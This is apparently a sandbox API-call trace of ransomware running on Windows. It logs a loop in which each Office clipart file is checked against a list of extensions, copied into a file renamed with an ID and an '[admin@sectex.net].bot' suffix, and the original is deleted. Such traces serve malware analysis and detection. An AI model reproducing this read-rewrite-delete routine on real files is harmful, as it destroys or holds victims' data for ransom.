	[0146.699] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.699] lstrlenW (lpString=".ppt") returned 4
	[0146.699] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 63
	[0146.699] lstrlenW (lpString=".zip") returned 4
	[0146.699] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.699] lstrlenW (lpString=".rar") returned 4
	[0146.699] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.699] lstrlenW (lpString=".bz2") returned 4
	[0146.699] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.699] lstrlenW (lpString=".7z") returned 3
	[0146.699] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 63
	[0146.699] lstrlenW (lpString=".dbf") returned 4
	[0146.699] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 63
	[0146.699] lstrlenW (lpString=".1cd") returned 4
	[0146.699] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 63
	[0146.699] lstrlenW (lpString=".jpg") returned 4
	[0146.699] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.700] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0146.700] lstrlenW (lpString="FD00965_.WMF") returned 12
	[0146.700] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00965_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0146.919] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=15164) returned 1
	[0146.919] CloseHandle (hObject=0x384) returned 1
	[0146.919] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00965_.wmf")) returned 0x20
	[0147.014] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00965_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00965_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0147.015] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.015] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00965_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0147.015] GetLastError () returned 0x0
	[0147.015] ReadFile (in: hFile=0x31c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x3b3c, lpOverlapped=0x0) returned 1
	[0147.064] WriteFile (in: hFile=0x38c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x3b40, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x3b40, lpOverlapped=0x0) returned 1
	[0147.065] ReadFile (in: hFile=0x31c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.065] WriteFile (in: hFile=0x38c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.066] SetEndOfFile (hFile=0x38c) returned 1
	[0147.066] CloseHandle (hObject=0x38c) returned 1
	[0147.066] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.066] SetEndOfFile (hFile=0x31c) returned 1
	[0147.068] CloseHandle (hObject=0x31c) returned 1
	[0147.068] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.077] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00965_.wmf")) returned 1
	[0147.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 63
	[0147.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 63
	[0147.094] lstrlenW (lpString=".doc") returned 4
	[0147.094] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.094] lstrlenW (lpString=".docx") returned 5
	[0147.094] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.094] lstrlenW (lpString=".pdf") returned 4
	[0147.094] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.094] lstrlenW (lpString=".xls") returned 4
	[0147.094] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.094] lstrlenW (lpString=".xlsx") returned 5
	[0147.094] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.094] lstrlenW (lpString=".ppt") returned 4
	[0147.094] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 63
	[0147.094] lstrlenW (lpString=".zip") returned 4
	[0147.095] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.095] lstrlenW (lpString=".rar") returned 4
	[0147.095] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.095] lstrlenW (lpString=".bz2") returned 4
	[0147.095] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.095] lstrlenW (lpString=".7z") returned 3
	[0147.095] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 63
	[0147.095] lstrlenW (lpString=".dbf") returned 4
	[0147.095] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 63
	[0147.095] lstrlenW (lpString=".1cd") returned 4
	[0147.095] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 63
	[0147.095] lstrlenW (lpString=".jpg") returned 4
	[0147.095] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 63
	[0147.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 63
	[0147.095] lstrlenW (lpString=".doc") returned 4
	[0147.095] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.095] lstrlenW (lpString=".docx") returned 5
	[0147.095] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.095] lstrlenW (lpString=".pdf") returned 4
	[0147.095] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.095] lstrlenW (lpString=".xls") returned 4
	[0147.095] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.095] lstrlenW (lpString=".xlsx") returned 5
	[0147.096] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.096] lstrlenW (lpString=".ppt") returned 4
	[0147.096] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 63
	[0147.096] lstrlenW (lpString=".zip") returned 4
	[0147.096] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.096] lstrlenW (lpString=".rar") returned 4
	[0147.096] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.096] lstrlenW (lpString=".bz2") returned 4
	[0147.096] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.096] lstrlenW (lpString=".7z") returned 3
	[0147.096] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 63
	[0147.096] lstrlenW (lpString=".dbf") returned 4
	[0147.096] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 63
	[0147.096] lstrlenW (lpString=".1cd") returned 4
	[0147.096] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 63
	[0147.096] lstrlenW (lpString=".jpg") returned 4
	[0147.096] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.096] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.096] lstrlenW (lpString="FD01548_.WMF") returned 12
	[0147.096] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01548_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0147.097] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=10316) returned 1
	[0147.097] CloseHandle (hObject=0x384) returned 1
	[0147.097] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01548_.wmf")) returned 0x20
	[0147.097] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01548_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01548_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0147.097] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.098] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.098] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01548_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0147.098] GetLastError () returned 0x0
	[0147.098] ReadFile (in: hFile=0x384, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x284c, lpOverlapped=0x0) returned 1
	[0147.149] WriteFile (in: hFile=0x268, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x2850, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x2850, lpOverlapped=0x0) returned 1
	[0147.150] ReadFile (in: hFile=0x384, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.150] WriteFile (in: hFile=0x268, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.150] SetEndOfFile (hFile=0x268) returned 1
	[0147.150] CloseHandle (hObject=0x268) returned 1
	[0147.150] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.150] SetEndOfFile (hFile=0x384) returned 1
	[0147.152] CloseHandle (hObject=0x384) returned 1
	[0147.152] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.153] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01548_.wmf")) returned 1
	[0147.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 63
	[0147.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 63
	[0147.153] lstrlenW (lpString=".doc") returned 4
	[0147.153] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.153] lstrlenW (lpString=".docx") returned 5
	[0147.153] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.153] lstrlenW (lpString=".pdf") returned 4
	[0147.153] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.154] lstrlenW (lpString=".xls") returned 4
	[0147.154] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.154] lstrlenW (lpString=".xlsx") returned 5
	[0147.154] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.154] lstrlenW (lpString=".ppt") returned 4
	[0147.154] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 63
	[0147.154] lstrlenW (lpString=".zip") returned 4
	[0147.154] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.154] lstrlenW (lpString=".rar") returned 4
	[0147.154] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.154] lstrlenW (lpString=".bz2") returned 4
	[0147.154] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.154] lstrlenW (lpString=".7z") returned 3
	[0147.154] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 63
	[0147.154] lstrlenW (lpString=".dbf") returned 4
	[0147.154] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 63
	[0147.154] lstrlenW (lpString=".1cd") returned 4
	[0147.154] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 63
	[0147.154] lstrlenW (lpString=".jpg") returned 4
	[0147.154] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 63
	[0147.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 63
	[0147.154] lstrlenW (lpString=".doc") returned 4
	[0147.154] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.154] lstrlenW (lpString=".docx") returned 5
	[0147.154] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.155] lstrlenW (lpString=".pdf") returned 4
	[0147.155] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.155] lstrlenW (lpString=".xls") returned 4
	[0147.155] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.155] lstrlenW (lpString=".xlsx") returned 5
	[0147.155] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.155] lstrlenW (lpString=".ppt") returned 4
	[0147.155] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 63
	[0147.155] lstrlenW (lpString=".zip") returned 4
	[0147.155] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.155] lstrlenW (lpString=".rar") returned 4
	[0147.155] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.155] lstrlenW (lpString=".bz2") returned 4
	[0147.155] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.155] lstrlenW (lpString=".7z") returned 3
	[0147.155] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 63
	[0147.155] lstrlenW (lpString=".dbf") returned 4
	[0147.155] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 63
	[0147.155] lstrlenW (lpString=".1cd") returned 4
	[0147.155] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 63
	[0147.155] lstrlenW (lpString=".jpg") returned 4
	[0147.155] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.155] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.155] lstrlenW (lpString="FD01659_.WMF") returned 12
	[0147.156] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01659_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0147.187] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=31180) returned 1
	[0147.187] CloseHandle (hObject=0x268) returned 1
	[0147.187] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01659_.wmf")) returned 0x20
	[0147.187] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01659_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.188] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01659_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0147.188] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.188] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.188] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01659_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0147.188] GetLastError () returned 0x0
	[0147.188] ReadFile (in: hFile=0x268, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x79cc, lpOverlapped=0x0) returned 1
	[0147.196] WriteFile (in: hFile=0x3a0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x79d0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x79d0, lpOverlapped=0x0) returned 1
	[0147.197] ReadFile (in: hFile=0x268, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.197] WriteFile (in: hFile=0x3a0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.197] SetEndOfFile (hFile=0x3a0) returned 1
	[0147.197] CloseHandle (hObject=0x3a0) returned 1
	[0147.197] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.197] SetEndOfFile (hFile=0x268) returned 1
	[0147.200] CloseHandle (hObject=0x268) returned 1
	[0147.200] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.200] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01659_.wmf")) returned 1
	[0147.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 63
	[0147.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 63
	[0147.201] lstrlenW (lpString=".doc") returned 4
	[0147.201] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.201] lstrlenW (lpString=".docx") returned 5
	[0147.201] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.201] lstrlenW (lpString=".pdf") returned 4
	[0147.201] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.201] lstrlenW (lpString=".xls") returned 4
	[0147.201] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.201] lstrlenW (lpString=".xlsx") returned 5
	[0147.201] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.201] lstrlenW (lpString=".ppt") returned 4
	[0147.201] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 63
	[0147.201] lstrlenW (lpString=".zip") returned 4
	[0147.201] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.201] lstrlenW (lpString=".rar") returned 4
	[0147.201] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.201] lstrlenW (lpString=".bz2") returned 4
	[0147.201] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.201] lstrlenW (lpString=".7z") returned 3
	[0147.201] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 63
	[0147.201] lstrlenW (lpString=".dbf") returned 4
	[0147.201] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 63
	[0147.201] lstrlenW (lpString=".1cd") returned 4
	[0147.201] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 63
	[0147.201] lstrlenW (lpString=".jpg") returned 4
	[0147.202] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 63
	[0147.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 63
	[0147.202] lstrlenW (lpString=".doc") returned 4
	[0147.202] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.202] lstrlenW (lpString=".docx") returned 5
	[0147.202] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.202] lstrlenW (lpString=".pdf") returned 4
	[0147.202] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.202] lstrlenW (lpString=".xls") returned 4
	[0147.202] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.202] lstrlenW (lpString=".xlsx") returned 5
	[0147.202] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.202] lstrlenW (lpString=".ppt") returned 4
	[0147.202] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 63
	[0147.202] lstrlenW (lpString=".zip") returned 4
